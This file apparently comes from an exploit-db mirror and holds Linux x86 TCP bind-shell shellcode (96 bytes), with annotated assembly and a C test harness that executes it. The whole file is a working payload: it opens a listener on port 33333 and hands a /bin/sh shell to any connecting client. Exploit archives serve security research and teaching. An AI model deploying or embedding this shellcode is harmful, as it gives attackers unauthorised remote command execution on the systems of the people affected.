exploit-db-mirror/shellcodes/linux_x86/36398.c

/*
 *  Linux x86 - TCP Bind Shell - 96 bytes
 *  Author: xmgv
 *  Details: https://xmgv.wordpress.com/2015/02/19/28/
 */

/*
global _start

section .text

_start:
    xor ebx, ebx    ; zero out ebx
    mul ebx         ; zero out eax, edx

    ;  socket(AF_INET, SOCK_STREAM, 0);
    mov al, 102     ; socketcall()
    mov bl, 1       ; socket()
    push edx        ; protocol
    push ebx        ; SOCK_STREAM
    push 2          ; AF_INET
    mov ecx, esp    ; load address of the parameter array
    int 0x80        ; call socketcall()

    ; eax contains the newly created socket
    mov esi, eax

    ; bind(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
    mov al, 102     ; socketcall()
    inc ebx         ; bind() - 2
    push edx          ; INADDR_ANY
    push word 0x3582 ; port
    push word bx     ; AF_INET
    mov ecx, esp    ; point to the structure
    push 16         ; sizeof(struct sockaddr_in)
    push ecx        ; &serv_addr
    push esi        ; sockfd
    mov ecx, esp    ; load address of the parameter array
    int 0x80        ; call socketcall()

    ; listen(sockfd, backlog);
    mov al, 102     ; socketcall()
    mov bl, 4       ; listen()
    push edx        ; backlog
    push esi        ; sockfd
    mov ecx, esp    ; load address of the parameter array
    int 0x80        ; call socketcall()

    ; accept(sockfd, (struct sockaddr *)&cli_addr, &sin_size);
    mov al, 102     ; socketcall()
    mov bl, 5       ; accept()
    push edx          ; zero addrlen
    push edx          ; null sockaddr
    push esi        ; sockfd
    mov ecx, esp    ; load address of the parameter array
    int 0x80        ; call socketcall()

    ; eax contains the descriptor for the accepted socket
    xchg ebx, eax

    xor ecx, ecx    ; zero out ecx
    mov cl, 2       ; initialize counter

    loop:
        ; dup2(connfd, 0);
        mov al, 63  ; dup2()
        int 0x80
        dec ecx
        jns loop

    ; execve(“/bin/sh”, [“/bin/sh”, NULL], NULL);
    xchg eax, edx
    push eax        ; push null bytes (terminate string)
    push 0x68732f2f ; //sh
    push 0x6e69622f ; /bin
    mov ebx, esp    ; load address of /bin/sh
    push eax        ; null terminator
    push ebx        ; push address of /bin/sh
    mov ecx, esp    ; load array address
    push eax        ; push null terminator
    mov edx, esp    ; empty envp array
    mov al, 11      ; execve()
    int 0x80        ; call execve()
*/

#include <stdio.h>
#include <string.h>

#define PORT_NUMBER "\x82\x35" // 33333

unsigned char code[] =
"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
"\x66\x43\x52\x66\x68"
PORT_NUMBER
"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80";

int main(void) {
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}